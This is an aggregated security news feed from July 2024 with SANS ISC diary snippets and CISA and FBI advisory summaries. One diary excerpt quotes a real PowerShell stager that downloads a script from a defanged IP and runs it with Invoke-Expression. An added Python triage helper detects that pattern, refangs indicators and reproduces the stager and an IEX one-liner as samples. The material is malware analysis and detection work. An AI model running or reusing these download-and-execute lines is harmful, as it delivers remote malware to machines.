Written by: Josh Murchie, Ashley Pearson, Joseph Pisano, Jake Nicastro, Joshua Shilko, Raymond Leong
Overview
In mid-2022, Mandiant's Managed Defense detected multiple intrusions involving QAKBOT, leading to the deployment of BEACON coupled with other pre-ransomware
Month: July 2024
ISC Stormcast For Monday, July 29th, 2024 https://isc.sans.edu/podcastdetail/9072, (Mon, Jul 29th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Quickie: Password Cracking & Energy, (Sun, Jul 28th)
When Johannes talked about my diary entry "Protected OOXML Spreadsheets" on his StormCast podcast, he mentioned that I privately shared data on the power consumption of my desktop with an NVIDIA GeForce RTX 3080 GPU when
CrowdStrike Outage Themed Maldoc, (Mon, Jul 29th)
I found a malicious Word document with VBA code using the CrowdStrike outage for social engineering purposes. It's an .ASD file (AutoRecover file). My tool oledump.py can analyze it: Before I dive into the VBA code,
Create Your Own BSOD: NotMyFault, (Sat, Jul 27th)
With all the Blue Screen Of Death screenshots we saw lately, I got the idea to write about Sysinternals' tool NotMyFault. Say that you want to practice handling BSODs, or that you need to document and
ExelaStealer Delivered “From Russia With Love”, (Fri, Jul 26th)
Some simple PowerShell scripts might deliver nasty content if executed by the target. I found a very simple one (with a low VT score of 8/65):
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add("X-Requested-With", "PowerShell")
$script = $webclient.DownloadString("hxxp://147[.]45[.]159[.]206/open.ps1")
Invoke-Expression
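The downloader above is the classic PowerShell stager shape: fetch remote text with WebClient, then hand it to Invoke-Expression. The following Python triage helper is an added example, not code from the diary or the sample it describes. It flags that download-plus-IEX combination, refangs the defanged indicator notation the diary uses (hxxp://, [.]) so the URL can be parsed, and pulls out hosts and custom headers for blocking and hunting. The SAMPLE string is constructed to mirror the excerpt; its last line completes the truncated Invoke-Expression call with "$script", which is an assumption, and the 198.51.100.7 address in the second sample is a documentation-range placeholder.

```python
"""Triage helper for PowerShell download-and-execute stagers.

Added example: flags the WebClient download -> Invoke-Expression pattern,
refangs hxxp:// and [.] indicator notation, and extracts hosts and headers.
"""
import json
import re
from urllib.parse import urlsplit

# Constructed sample mirroring the diary excerpt. The excerpt is cut off after
# "Invoke-Expression"; the "$script" argument on the last line is an assumption.
SAMPLE = (
    '$webclient = New-Object System.Net.WebClient\n'
    '$webclient.Headers.Add("X-Requested-With", "PowerShell")\n'
    '$script = $webclient.DownloadString("hxxp://147[.]45[.]159[.]206/open.ps1")\n'
    'Invoke-Expression $script\n'
)

# Constructed sample of the more common one-liner form (IEX wraps the download).
# 198.51.100.7 is a documentation-range placeholder, not a real indicator.
ONE_LINER = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a.ps1")'

# WebClient methods that bring remote content into the script.
DOWNLOAD_RE = re.compile(r'\.(DownloadString|DownloadData|DownloadFile)\s*\(', re.I)
# Invoke-Expression and its IEX alias evaluate a string as PowerShell code.
EXEC_RE = re.compile(r'(?<![\w-])(Invoke-Expression|IEX)(?![\w-])', re.I)
# Live (http/https) and defanged (hxxp/hxxps) URLs, stopping at quotes or space.
URL_RE = re.compile(r'\b(?:h[xt]{2}ps?)://[^\s"\'()]+', re.I)
# Custom request headers, e.g. the X-Requested-With marker in the sample.
HEADER_RE = re.compile(r'\.Headers\.Add\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)', re.I)


def refang(indicator: str) -> str:
    """Turn defanged indicator notation back into a parseable URL."""
    s = re.sub(r'^hxxp', 'http', indicator, flags=re.I)
    return s.replace('[.]', '.').replace('(.)', '.').replace('[:]', ':')


def triage(script: str) -> dict:
    """Flag the download-then-evaluate stager pattern and pull indicators."""
    download = DOWNLOAD_RE.search(script) is not None
    evaluate = EXEC_RE.search(script) is not None
    urls = [refang(u) for u in URL_RE.findall(script)]
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    headers = dict(HEADER_RE.findall(script))
    return {
        "download": download,
        "exec": evaluate,
        # Remote content fetched and evaluated in the same script, regardless
        # of textual order (IEX often wraps the download call).
        "stager_pattern": download and evaluate,
        "urls": urls,
        "hosts": hosts,
        "headers": headers,
    }


if __name__ == "__main__":
    for name, text in (("SAMPLE", SAMPLE), ("ONE_LINER", ONE_LINER)):
        print(name)
        print(json.dumps(triage(text), indent=2))
```

The header is worth keeping as an indicator in its own right: a script that sets X-Requested-With to "PowerShell" is announcing its client to the server, and that string is cheap to hunt for in proxy logs.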
ISC Stormcast For Friday, July 26th, 2024 https://isc.sans.edu/podcastdetail/9070, (Fri, Jul 26th)
CISA Releases Two Industrial Control Systems Advisories
CISA released two Industrial Control Systems (ICS) advisories on July 25, 2024. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
ICSA-24-207-01 Siemens SICAM Products
ICSA-24-207-02 Positron Broadcast Signal Processor
CISA
North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs
Summary The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB)
Siemens SICAM Products
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens' ProductCERT Security Advisories